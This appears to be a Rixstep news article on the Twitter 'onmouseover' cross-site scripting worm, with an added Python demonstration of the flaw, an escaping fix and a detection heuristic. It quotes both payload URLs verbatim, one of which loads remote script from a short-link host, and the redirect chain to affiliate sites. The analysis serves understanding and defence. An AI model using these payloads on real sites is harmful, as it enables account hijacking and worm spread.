Rixstep

Link Shortener Exploit Cripples Twitter

'Twas fun but it might be over now.



SAN FRANCISCO (Rixstep) — There's been another setback for those dilettantes of the derring-do readying a rollout of a new version of their realtime social software.

There's been an annoying exploit that messes with everyone's Twitter feeds.


Graham Clueless of Sophos seems to have investigated the bug/exploit from Apple's platform (a move that took all too long), and Mashable have reported on it, but Rixstep have not seen the exploit work on OS X.

Some people report bad things already on 'mouse over' ops. And it might be difficult to remove the corrupted tweets unless people get over to third party apps that run on the local machine.

Mrs Brown You've Got a Lovely Tweeter

This is what Sarah Brown's Twitter feed looked like earlier today - typical for what happened.



The difference - YMMV - is that at least FF and Safari on OS X didn't seem to make viable links out of the mess. Another difference of course is that OS X is infinitely more impervious at system level to attacks like this anyway.

http://is.gd/fl5d3

Mrs B chose TweetDeck (Bad Decision™) for the time being. The Twitter crew may already have fixed their Ruby as of this Tuesday.

Here's what Sarah's two corrupted links looked like.

http://a.no/@%22onmouseover=%22;$('textarea:first').val(this.innerHTML);$('.status-update-form').submit();%22class=%22modal-overlay%22/

http://t.co/@%22style=%22font-size:999999999999px;%22onmouseover=%22$.getScript('http:\u002f\u002fis.gd\u002ffl5d3')%22/

The latter part of the second tweet is a URL crafted with Unicode escapes. The redirect has already been shut down by is.gd.
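As an added example (not from the article, and not Twitter's code), the Python below feeds the two links above to a deliberately naive linkifier to show how the quote in the URL turns `onmouseover` into a real attribute, shows that attribute-encoding the value stops that, and expands the `\u002f` escapes so the is.gd URL hidden in the second link becomes visible to a feed scanner. The linkifier, the detection heuristic and the sample list are constructed here, not taken from any real implementation.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample input: the two link-shortener payloads quoted above,
# exactly as they appeared in the tweets (percent-encoded, with \u escapes).
SAMPLE_LINKS = [
    r"http://a.no/@%22onmouseover=%22;$('textarea:first').val(this.innerHTML);$('.status-update-form').submit();%22class=%22modal-overlay%22/",
    r"http://t.co/@%22style=%22font-size:999999999999px;%22onmouseover=%22$.getScript('http:\u002f\u002fis.gd\u002ffl5d3')%22/",
]

# Attribute names a browser would see in an opening tag: a name followed by '='
# that sits at the start of the tag or right after a quote, whitespace or '/'.
ATTR_NAME = re.compile(r'(?:^|["\s/])([a-zA-Z][\w-]*)\s*=')
JS_UNICODE = re.compile(r'\\u([0-9a-fA-F]{4})')
URL = re.compile(r'https?://[^\s\'")]+')


def open_tag_unsafe(url):
    """The failure mode: the percent-decoded URL is dropped into href as-is."""
    return '<a href="%s">' % unquote(url)


def open_tag_safe(url):
    """Hardened linkifier: attribute-encode the value, so a quote inside it
    becomes &quot; and can no longer terminate the href attribute."""
    return '<a href="%s">' % html.escape(unquote(url), quote=True)


def attribute_names(open_tag):
    """Attributes the browser ends up with for the rendered opening tag."""
    return ATTR_NAME.findall(open_tag)


def looks_like_breakout(url):
    """Detection heuristic for scanning a feed: a quote immediately followed
    by an on* event-handler attribute, checked after percent-decoding."""
    return re.search(r'"\s*on\w+\s*=', unquote(url), re.I) is not None


def urls_hidden_by_escapes(s):
    """URLs that only appear once JavaScript \\uXXXX escapes are expanded,
    i.e. the http:\\u002f\\u002f trick used to dodge plain link detection."""
    expanded = JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)
    return sorted(set(URL.findall(expanded)) - set(URL.findall(s)))
```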



The redirect led to a URL that generated a 302 - another redirect.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://click.dtiserv2.com/Click144/88-23-2277">here</A>.<P>
</BODY></HTML>

That redirect in typical fashion leads to yet another redirect.

Please direct your browser to: http://click.d2pass.com?md5=e9aaa38a37ac8b87fe86c3d5a91673d5&r=http%3A%2F%2Faffiliate.dtiserv.com%2Flink%2Findex.html&popup%20window=88-23-2277.1287670295&dtiAff2=88-2277.1287670295&dtiFromSite=23.1287670295&_c=144-88-23-2277.1287670295

Or unescaped:

Please direct your browser to: http://click.d2pass.com?md5=e9aaa38a37ac8b87fe86c3d5a91673d5&r=http://affiliate.dtiserv.com/link/index.html&popup window=88-23-2277.1287670295&dtiAff2=88-2277.1287670295&dtiFromSite=23.1287670295&_c=144-88-23-2277.1287670295

Somebody seemed to be trying to make quick pocket change on click-throughs (and possibly more on Windows).

Use a third party app to connect to Twitter to clean your corrupted tweets; preferably do not use Windows when connecting to Twitter; preferably do not use Windows at all.

But that last bit you should already understand.

Copyright © Rixstep. All rights reserved.